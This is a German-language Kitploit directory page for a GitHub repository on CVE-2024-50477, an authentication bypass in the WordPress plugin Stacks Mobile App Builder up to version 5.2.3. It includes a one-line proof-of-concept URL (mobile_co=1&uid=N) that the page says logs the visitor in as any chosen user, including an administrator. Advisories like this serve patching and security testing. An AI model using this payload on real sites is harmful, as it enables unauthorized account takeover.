Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-50477 — Stacks Mobile App Builder <= 5.2.3 - Authentifizierungsumgehung durch Kontoübernahme | Kitploit
Tools/GitHubGitHub/randomrobbiebf/cve-2024-50477
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubrandomrobbiebf/cve-2024-50477

CVE-2024-50477

Stacks Mobile App Builder <= 5.2.3 - Authentifizierungsumgehung durch Kontoübernahme

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-50477

Stacks Mobile App Builder <= 5.2.3 - Authentifizierungsumgehung durch Kontoübernahme

Beschreibung:

Der Stacks Mobile App Builder – das leistungsstärkste Drag-and-Drop-Builder-Plugin für mobile Anwendungen für WordPress – ist in allen Versionen bis einschließlich 5.2.3 anfällig für eine Authentifizierungsumgehung. Dies liegt daran, dass das Plugin die Identität eines Benutzers vor der Authentifizierung über die Funktion receive_request_checkout() nicht ordnungsgemäß überprüft. Dadurch ist es nicht authentifizierten Angreifern möglich, sich basierend auf der Benutzer-ID als beliebiger Benutzer anzumelden.

root@kitploit:~
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50477
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: stacks-mobile-app-builder

POC

root@kitploit:~
http://kubernetes.docker.internal/?mobile_co=1&uid=1

Sie sollten weitergeleitet und als Administrator angemeldet werden. Die ID ist der Benutzer, mit dem Sie sich anmelden möchten.

Tool herunterladen